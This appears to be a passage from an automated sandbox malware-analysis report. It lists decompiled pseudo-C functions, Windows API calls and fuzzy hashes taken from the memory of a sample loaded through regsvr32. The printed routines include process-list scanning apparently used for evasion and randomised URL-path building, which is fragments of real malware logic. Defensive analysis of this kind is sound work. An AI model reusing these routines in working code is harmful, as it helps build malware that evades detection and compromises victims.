                                • CreateEventA.KERNEL32(02BDD2AC,00000001,00000000,00000040,00000001,?,74E5F710,00000000,74E5F730,?,?,?,02BD7D37,?,00000001,?), ref: 02BD98C1
                                • SetEvent.KERNEL32(00000000,?,?,?,02BD7D37,?,00000001,?,00000002,?,?,02BD312C,?), ref: 02BD98CE
                                • Sleep.KERNEL32(00000BB8,?,?,?,02BD7D37,?,00000001,?,00000002,?,?,02BD312C,?), ref: 02BD98D9
                                • CloseHandle.KERNEL32(00000000,?,?,?,02BD7D37,?,00000001,?,00000002,?,?,02BD312C,?), ref: 02BD98E0
                                  • Part of subcall function 02BD5BC0: WaitForSingleObject.KERNEL32(00000000,?,?,?,02BD9900,?,02BD9900,?,?,?,?,?,02BD9900,?), ref: 02BD5C9A
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                • String ID:
                                • API String ID: 2559942907-0
                                • Opcode ID: 1713b645e3369d20635cafa85a504817c28da834021a0626769793e42171b553
                                • Instruction ID: 0080c6b1ba8bcdc0199ab45cf1fb3899358e33d7c9608335ef29d151c3cf1d48
                                • Opcode Fuzzy Hash: 1713b645e3369d20635cafa85a504817c28da834021a0626769793e42171b553
                                • Instruction Fuzzy Hash: E921C673D00619ABDB20AFE4C8849EEB7BDEF44354B4144A6EB55E7100F7789945CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 78%
                                			E02BD5F58(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                				intOrPtr _v8;
                                				void* _v12;
                                				void* _v16;
                                				intOrPtr _t26;
                                				intOrPtr* _t28;
                                				intOrPtr _t31;
                                				intOrPtr* _t32;
                                				void* _t39;
                                				int _t46;
                                				intOrPtr* _t47;
                                				int _t48;
                                
                                				_t47 = __eax;
                                				_push( &_v12);
                                				_push(__eax);
                                				_t39 = 0;
                                				_t46 = 0;
                                				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                				_v8 = _t26;
                                				if(_t26 < 0) {
                                					L13:
                                					return _v8;
                                				}
                                				if(_v12 == 0) {
                                					Sleep(0xc8);
                                					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                				}
                                				if(_v8 >= _t39) {
                                					_t28 = _v12;
                                					if(_t28 != 0) {
                                						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                						_v8 = _t31;
                                						if(_t31 >= 0) {
                                							_t46 = lstrlenW(_v16);
                                							if(_t46 != 0) {
                                								_t46 = _t46 + 1;
                                								_t48 = _t46 + _t46;
                                								_t39 = E02BD1525(_t48);
                                								if(_t39 == 0) {
                                									_v8 = 0x8007000e;
                                								} else {
                                									memcpy(_t39, _v16, _t48);
                                								}
                                								__imp__#6(_v16);
                                							}
                                						}
                                						_t32 = _v12;
                                						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                					}
                                					 *_a4 = _t39;
                                					 *_a8 = _t46 + _t46;
                                				}
                                				goto L13;
                                			}
                                0x02bd5f64
                                0x02bd5f68
                                0x02bd5f69
                                0x02bd5f6a
                                0x02bd5f6c
                                0x02bd5f6e
                                0x02bd5f71
                                0x02bd5f76
                                0x02bd600d
                                0x02bd6014
                                0x02bd6014
                                0x02bd5f7f
                                0x02bd5f86
                                0x02bd5f96
                                0x02bd5f96
                                0x02bd5f9c
                                0x02bd5f9e
                                0x02bd5fa3
                                0x02bd5fac
                                0x02bd5fb2
                                0x02bd5fb7
                                0x02bd5fc2
                                0x02bd5fc6
                                0x02bd5fc8
                                0x02bd5fc9
                                0x02bd5fd2
                                0x02bd5fd6
                                0x02bd5fe7
                                0x02bd5fd8
                                0x02bd5fdd
                                0x02bd5fe2
                                0x02bd5ff1
                                0x02bd5ff1
                                0x02bd5fc6
                                0x02bd5ff7
                                0x02bd5ffd
                                0x02bd5ffd
                                0x02bd6006
                                0x02bd600b
                                0x02bd600b
                                0x00000000

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: FreeSleepStringlstrlenmemcpy
                                • String ID:
                                • API String ID: 1198164300-0
                                • Opcode ID: 2cca96a70e27d1bd0628d74122335ca2bcf11beb59b5ed36c6b4018728ee1ae7
                                • Instruction ID: 51be1459eaf107ebf69e7ff385fe0f4e48266677b617b5f5fd167b73bdc87b71
                                • Opcode Fuzzy Hash: 2cca96a70e27d1bd0628d74122335ca2bcf11beb59b5ed36c6b4018728ee1ae7
                                • Instruction Fuzzy Hash: 21214F7590120AEFCB11DFA8D8949DEBBB9FF48344B1081A9E946E7200FB30DA44CF60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E02BDA41C(unsigned int __eax, void* __ecx) {
                                				void* _v8;
                                				void* _v12;
                                				signed int _t21;
                                				signed short _t23;
                                				char* _t27;
                                				void* _t29;
                                				void* _t30;
                                				unsigned int _t33;
                                				void* _t37;
                                				unsigned int _t38;
                                				void* _t41;
                                				void* _t42;
                                				int _t45;
                                				void* _t46;
                                
                                				_t42 = __eax;
                                				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                				_t38 = __eax;
                                				_t30 = RtlAllocateHeap( *0x2bdd238, 0, (__eax >> 3) + __eax + 1);
                                				_v12 = _t30;
                                				if(_t30 != 0) {
                                					_v8 = _t42;
                                					do {
                                						_t33 = 0x18;
                                						if(_t38 <= _t33) {
                                							_t33 = _t38;
                                						}
                                						_t21 =  *0x2bdd250; // 0xa58ef514
                                						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                						 *0x2bdd250 = _t23;
                                						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                						memcpy(_t30, _v8, _t45);
                                						_v8 = _v8 + _t45;
                                						_t27 = _t30 + _t45;
                                						_t38 = _t38 - _t45;
                                						_t46 = _t46 + 0xc;
                                						 *_t27 = 0x2f;
                                						_t13 = _t27 + 1; // 0x1
                                						_t30 = _t13;
                                					} while (_t38 > 8);
                                					memcpy(_t30, _v8, _t38 + 1);
                                				}
                                				return _v12;
                                			}
                                0x02bda424
                                0x02bda427
                                0x02bda42d
                                0x02bda445
                                0x02bda447
                                0x02bda44c
                                0x02bda44e
                                0x02bda451
                                0x02bda453
                                0x02bda456
                                0x02bda458
                                0x02bda458
                                0x02bda45a
                                0x02bda465
                                0x02bda46a
                                0x02bda47b
                                0x02bda483
                                0x02bda488
                                0x02bda48b
                                0x02bda48e
                                0x02bda490
                                0x02bda493
                                0x02bda496
                                0x02bda496
                                0x02bda499
                                0x02bda4a4
                                0x02bda4a9
                                0x02bda4b3

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02BD7C20,00000000,?,?,02BD9DA0,?,050095B0), ref: 02BDA427
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 02BDA43F
                                • memcpy.NTDLL(00000000,?,-00000008,?,?,?,02BD7C20,00000000,?,?,02BD9DA0,?,050095B0), ref: 02BDA483
                                • memcpy.NTDLL(00000001,?,00000001), ref: 02BDA4A4
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: memcpy$AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 1819133394-0
                                • Opcode ID: 9409027820e9504ef47263256c0b863c478f52c82a913cf32a895e68c27d5438
                                • Instruction ID: 0cf9b5c4788c3dfaa00f7589c68a1ad9aa97d4c71d1a1271a7d73934cf345d16
                                • Opcode Fuzzy Hash: 9409027820e9504ef47263256c0b863c478f52c82a913cf32a895e68c27d5438
                                • Instruction Fuzzy Hash: 2D11E972A41115AFC7108AA9DC98EDEBFAEDBC43A1B0902B6F944D7140F770AE14CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E02BD8F1B() {
                                				char _v264;
                                				void* _v300;
                                				int _t8;
                                				intOrPtr _t9;
                                				int _t15;
                                				void* _t17;
                                
                                				_t15 = 0;
                                				_t17 = CreateToolhelp32Snapshot(2, 0);
                                				if(_t17 != 0) {
                                					_t8 = Process32First(_t17,  &_v300);
                                					while(_t8 != 0) {
                                						_t9 =  *0x2bdd2a8; // 0x242a5a8
                                						_t2 = _t9 + 0x2bdee34; // 0x73617661
                                						_push( &_v264);
                                						if( *0x2bdd0fc() != 0) {
                                							_t15 = 1;
                                						} else {
                                							_t8 = Process32Next(_t17,  &_v300);
                                							continue;
                                						}
                                						L7:
                                						CloseHandle(_t17);
                                						goto L8;
                                					}
                                					goto L7;
                                				}
                                				L8:
                                				return _t15;
                                			}
                                0x02bd8f26
                                0x02bd8f30
                                0x02bd8f34
                                0x02bd8f3e
                                0x02bd8f6f
                                0x02bd8f45
                                0x02bd8f4a
                                0x02bd8f57
                                0x02bd8f60
                                0x02bd8f77
                                0x02bd8f62
                                0x02bd8f6a
                                0x00000000
                                0x02bd8f6a
                                0x02bd8f78
                                0x02bd8f79
                                0x00000000
                                0x02bd8f79
                                0x00000000
                                0x02bd8f73
                                0x02bd8f7f
                                0x02bd8f84

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02BD8F2B
                                • Process32First.KERNEL32(00000000,?), ref: 02BD8F3E
                                • Process32Next.KERNEL32(00000000,?), ref: 02BD8F6A
                                • CloseHandle.KERNEL32(00000000), ref: 02BD8F79
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 62c6459fe67a7cdc770e285368e9d64a8c0d55bda4ccf07138b3d88877f1c66b
                                • Instruction ID: a2f7d91e59c8df877088b5543b708bc2a0e077b141607646790addc47475f8a0
                                • Opcode Fuzzy Hash: 62c6459fe67a7cdc770e285368e9d64a8c0d55bda4ccf07138b3d88877f1c66b
                                • Instruction Fuzzy Hash: DCF0BB325011256BD720B6369C49EEFB76EDBC5751F4105D1E945D3000F730DA96CAA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E02BD8C01(void* __esi) {
                                				struct _SECURITY_ATTRIBUTES* _v4;
                                				void* _t8;
                                				void* _t10;
                                
                                				_v4 = 0;
                                				memset(__esi, 0, 0x38);
                                				_t8 = CreateEventA(0, 1, 0, 0);
                                				 *(__esi + 0x1c) = _t8;
                                				if(_t8 != 0) {
                                					_t10 = CreateEventA(0, 1, 1, 0);
                                					 *(__esi + 0x20) = _t10;
                                					if(_t10 == 0) {
                                						CloseHandle( *(__esi + 0x1c));
                                					} else {
                                						_v4 = 1;
                                					}
                                				}
                                				return _v4;
                                			}
                                0x02bd8c0b
                                0x02bd8c0f
                                0x02bd8c24
                                0x02bd8c26
                                0x02bd8c2b
                                0x02bd8c31
                                0x02bd8c33
                                0x02bd8c38
                                0x02bd8c43
                                0x02bd8c3a
                                0x02bd8c3a
                                0x02bd8c3a
                                0x02bd8c38
                                0x02bd8c51

                                APIs
                                • memset.NTDLL ref: 02BD8C0F
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74E481D0), ref: 02BD8C24
                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 02BD8C31
                                • CloseHandle.KERNEL32(?), ref: 02BD8C43
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: CreateEvent$CloseHandlememset
                                • String ID:
                                • API String ID: 2812548120-0
                                • Opcode ID: 8faa5951361c736fce72da777a23dd49d9294387ecbebd9840fbc2429f64cf7f
                                • Instruction ID: 78687e93f6e85cc3ea516d86837c26bbca912666eaa00f5e8272a56bbcd3b21d
                                • Opcode Fuzzy Hash: 8faa5951361c736fce72da777a23dd49d9294387ecbebd9840fbc2429f64cf7f
                                • Instruction Fuzzy Hash: B7F0E2F150630DBFD3106F26DCC0C6BBBACEB4119EB114E6EF046C2110E632A8498AA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E02BD4DB1() {
                                				void* _t1;
                                				intOrPtr _t5;
                                				void* _t6;
                                				void* _t7;
                                				void* _t11;
                                
                                				_t1 =  *0x2bdd26c; // 0x2b8
                                				if(_t1 == 0) {
                                					L8:
                                					return 0;
                                				}
                                				SetEvent(_t1);
                                				_t11 = 0x7fffffff;
                                				while(1) {
                                					SleepEx(0x64, 1);
                                					_t5 =  *0x2bdd2bc; // 0x0
                                					if(_t5 == 0) {
                                						break;
                                					}
                                					_t11 = _t11 - 0x64;
                                					if(_t11 > 0) {
                                						continue;
                                					}
                                					break;
                                				}
                                				_t6 =  *0x2bdd26c; // 0x2b8
                                				if(_t6 != 0) {
                                					CloseHandle(_t6);
                                				}
                                				_t7 =  *0x2bdd238; // 0x4c10000
                                				if(_t7 != 0) {
                                					HeapDestroy(_t7);
                                				}
                                				goto L8;
                                			}
                                0x02bd4db1
                                0x02bd4db8
                                0x02bd4e02
                                0x02bd4e04
                                0x02bd4e04
                                0x02bd4dbc
                                0x02bd4dc2
                                0x02bd4dc7
                                0x02bd4dcb
                                0x02bd4dd1
                                0x02bd4dd8
                                0x00000000
                                0x00000000
                                0x02bd4dda
                                0x02bd4ddf
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02bd4ddf
                                0x02bd4de1
                                0x02bd4de9
                                0x02bd4dec
                                0x02bd4dec
                                0x02bd4df2
                                0x02bd4df9
                                0x02bd4dfc
                                0x02bd4dfc
                                0x00000000

                                APIs
                                • SetEvent.KERNEL32(000002B8,00000001,02BD7F41), ref: 02BD4DBC
                                • SleepEx.KERNEL32(00000064,00000001), ref: 02BD4DCB
                                • CloseHandle.KERNEL32(000002B8), ref: 02BD4DEC
                                • HeapDestroy.KERNEL32(04C10000), ref: 02BD4DFC
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: CloseDestroyEventHandleHeapSleep
                                • String ID:
                                • API String ID: 4109453060-0
                                • Opcode ID: 70a6496b090ea9d2dff4bfc8e78c0f6807d6821eaa7f70a1133f50e576f2031b
                                • Instruction ID: 8146423066380f3f9f64bcdaac8c4c92cc487b37cd27e4f654b8d5a878cabbfc
                                • Opcode Fuzzy Hash: 70a6496b090ea9d2dff4bfc8e78c0f6807d6821eaa7f70a1133f50e576f2031b
                                • Instruction Fuzzy Hash: 48F01C76E833129BDA206A75DD58BC73AA8EB047E1B454A54B950D7284FB70CC50D660
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E02BD5B05(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                				struct _FILETIME _v12;
                                				void* _t11;
                                				short _t19;
                                				void* _t22;
                                				void* _t24;
                                				void* _t25;
                                				short* _t26;
                                
                                				_t24 = __edx;
                                				_t25 = E02BD7B3B(_t11, _a12);
                                				if(_t25 == 0) {
                                					_t22 = 8;
                                				} else {
                                					_t26 = _t25 + _a16 * 2;
                                					 *_t26 = 0;
                                					_t22 = E02BD2D2E(__ecx, _a4, _a8, _t25);
                                					if(_t22 == 0) {
                                						GetSystemTimeAsFileTime( &_v12);
                                						_t19 = 0x5f;
                                						 *_t26 = _t19;
                                						_t22 = E02BDA38F(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
                                					}
                                					HeapFree( *0x2bdd238, 0, _t25);
                                				}
                                				return _t22;
                                			}
                                0x02bd5b05
                                0x02bd5b16
                                0x02bd5b1a
                                0x02bd5b75
                                0x02bd5b1c
                                0x02bd5b23
                                0x02bd5b2b
                                0x02bd5b33
                                0x02bd5b37
                                0x02bd5b3d
                                0x02bd5b45
                                0x02bd5b48
                                0x02bd5b60
                                0x02bd5b60
                                0x02bd5b6b
                                0x02bd5b6b
                                0x02bd5b7c

                                APIs
                                  • Part of subcall function 02BD7B3B: lstrlen.KERNEL32(?,00000000,05009D18,00000000,02BD5142,05009F3B,?,?,?,?,?,69B25F44,00000005,02BDD00C), ref: 02BD7B42
                                  • Part of subcall function 02BD7B3B: mbstowcs.NTDLL ref: 02BD7B6B
                                  • Part of subcall function 02BD7B3B: memset.NTDLL ref: 02BD7B7D
                                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,0500935C), ref: 02BD5B3D
                                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,0500935C), ref: 02BD5B6B
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                • String ID: Ut
                                • API String ID: 1500278894-8415677
                                • Opcode ID: 696d2fbce211b059f5204f3edf80118f924608d5154105c748c2f946b69ede7b
                                • Instruction ID: 0c0e7eb271c43defa45fe081982cdf276f0a43fb57857a1120ca104643cd9b34
                                • Opcode Fuzzy Hash: 696d2fbce211b059f5204f3edf80118f924608d5154105c748c2f946b69ede7b
                                • Instruction Fuzzy Hash: 6E017C32600209BBDB226FA4DC44FDABB69EF84794F50446AFA409A160EB71D965CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			E02BD8CFA(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                				intOrPtr* _v8;
                                				void* _t17;
                                				intOrPtr* _t22;
                                				void* _t27;
                                				char* _t30;
                                				void* _t33;
                                				void* _t34;
                                				void* _t36;
                                				void* _t37;
                                				void* _t39;
                                				int _t42;
                                
                                				_t17 = __eax;
                                				_t37 = 0;
                                				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                				_t2 = _t17 + 1; // 0x1
                                				_t28 = _t2;
                                				_t34 = E02BD1525(_t2);
                                				if(_t34 != 0) {
                                					_t30 = E02BD1525(_t28);
                                					if(_t30 == 0) {
                                						E02BD8B22(_t34);
                                					} else {
                                						_t39 = _a4;
                                						_t22 = E02BDA7C2(_t39);
                                						_v8 = _t22;
                                						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                							_a4 = _t39;
                                						} else {
                                							_t26 = _t22 + 2;
                                							_a4 = _t22 + 2;
                                							_t22 = E02BDA7C2(_t26);
                                							_v8 = _t22;
                                						}
                                						if(_t22 == 0) {
                                							__imp__(_t34, _a4);
                                							 *_t30 = 0x2f;
                                							 *((char*)(_t30 + 1)) = 0;
                                						} else {
                                							_t42 = _t22 - _a4;
                                							memcpy(_t34, _a4, _t42);
                                							 *((char*)(_t34 + _t42)) = 0;
                                							__imp__(_t30, _v8);
                                						}
                                						 *_a8 = _t34;
                                						_t37 = 1;
                                						 *_a12 = _t30;
                                					}
                                				}
                                				return _t37;
                                			}

                                Statement addresses for the listing above: 0x02bd8cfa to 0x02bd8da8

                                APIs
                                • lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,02BD9816,?,?,?,?,00000102,02BD937B,?,?,00000000), ref: 02BD8D06
                                  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
                                  • Part of subcall function 02BDA7C2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02BD8D34,00000000,00000001,00000001,?,?,02BD9816,?,?,?,?,00000102), ref: 02BDA7D0
                                  • Part of subcall function 02BDA7C2: StrChrA.SHLWAPI(?,0000003F,?,?,02BD9816,?,?,?,?,00000102,02BD937B,?,?,00000000,00000000), ref: 02BDA7DA
                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02BD9816,?,?,?,?,00000102,02BD937B,?), ref: 02BD8D64
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 02BD8D74
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 02BD8D80
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                • String ID:
                                • API String ID: 3767559652-0
                                • Opcode ID: 6edae6deeacb693bc99ae0617ca66cce8290e694aa5bb9e8b955f41ab442e3ea
                                • Instruction ID: 72141147746b5afab4bd8765def92683c6043aaf8638056428ec899ad1cd6492
                                • Opcode Fuzzy Hash: 6edae6deeacb693bc99ae0617ca66cce8290e694aa5bb9e8b955f41ab442e3ea
                                • Instruction Fuzzy Hash: 1821E172500215BFCB026F78CC54AEA7FB9EF16384B1484D9F8059B251FB30C902CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E02BD272D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                				void* _v8;
                                				void* _t18;
                                				int _t25;
                                				int _t29;
                                				int _t34;
                                
                                				_t29 = lstrlenW(_a4);
                                				_t25 = lstrlenW(_a8);
                                				_t18 = E02BD1525(_t25 + _t29 + _t25 + _t29 + 2);
                                				_v8 = _t18;
                                				if(_t18 != 0) {
                                					_t34 = _t29 + _t29;
                                					memcpy(_t18, _a4, _t34);
                                					_t10 = _t25 + 2; // 0x2
                                					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                				}
                                				return _v8;
                                			}

                                Statement addresses for the listing above: 0x02bd2742 to 0x02bd2786

                                APIs
                                • lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,0500935C,?,02BD5398,004F0053,0500935C,?,?,?,?,?,?,02BD7CCB), ref: 02BD273D
                                • lstrlenW.KERNEL32(02BD5398,?,02BD5398,004F0053,0500935C,?,?,?,?,?,?,02BD7CCB), ref: 02BD2744
                                  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
                                • memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,02BD5398,004F0053,0500935C,?,?,?,?,?,?,02BD7CCB), ref: 02BD2764
                                • memcpy.NTDLL(74E069A0,02BD5398,00000002,00000000,004F0053,74E069A0,?,?,02BD5398,004F0053,0500935C), ref: 02BD2777
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: lstrlenmemcpy$AllocateHeap
                                • String ID:
                                • API String ID: 2411391700-0
                                • Opcode ID: 08f65026b31cf1649312b2434417c5bd12554228f58f0c8155982f0cd8684a5c
                                • Instruction ID: 02f9041352f3a9f37ee1e8389762221165bcde40bfcb0d23f5c0502b911549f1
                                • Opcode Fuzzy Hash: 08f65026b31cf1649312b2434417c5bd12554228f58f0c8155982f0cd8684a5c
                                • Instruction Fuzzy Hash: 70F03C32900119BB8F119FA9CC44CDE7BADEF082947454062AD04D7105FA75EA108BA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(05009B08,00000000,00000000,7691C740,02BD9DCB,00000000), ref: 02BDA687
                                • lstrlen.KERNEL32(?), ref: 02BDA68F
                                  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
                                • lstrcpy.KERNEL32(00000000,05009B08), ref: 02BDA6A3
                                • lstrcat.KERNEL32(00000000,?), ref: 02BDA6AE
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                • String ID:
                                • API String ID: 74227042-0
                                • Opcode ID: 05168e9084cdf5735e0afe842a3087ddc2e41c8a39dee14e60406f2cbceaca58
                                • Instruction ID: 2508e773bea6d0d1a598f1968e8ff07b76df564c613de7c6c7665f4f7f0d8197
                                • Opcode Fuzzy Hash: 05168e9084cdf5735e0afe842a3087ddc2e41c8a39dee14e60406f2cbceaca58
                                • Instruction Fuzzy Hash: D5E09233902621A787119BE8AC48CDBBFADEF896953040817F600D3100E724C815CBE1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Executed Functions

                                Control-flow Graph

                                C-Code - Quality: 38%
                                			E04A49A0F(char _a4, void* _a8) {
                                				void* _v8;
                                				void* _v12;
                                				char _v16;
                                				void* _v20;
                                				char _v24;
                                				char _v28;
                                				char _v32;
                                				char _v36;
                                				char _v40;
                                				void* _v44;
                                				void** _t33;
                                				void* _t40;
                                				void* _t43;
                                				void** _t44;
                                				intOrPtr* _t47;
                                				char _t48;
                                
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v20 = _a4;
                                				_t48 = 0;
                                				_v16 = 0;
                                				_a4 = 0;
                                				_v44 = 0x18;
                                				_v40 = 0;
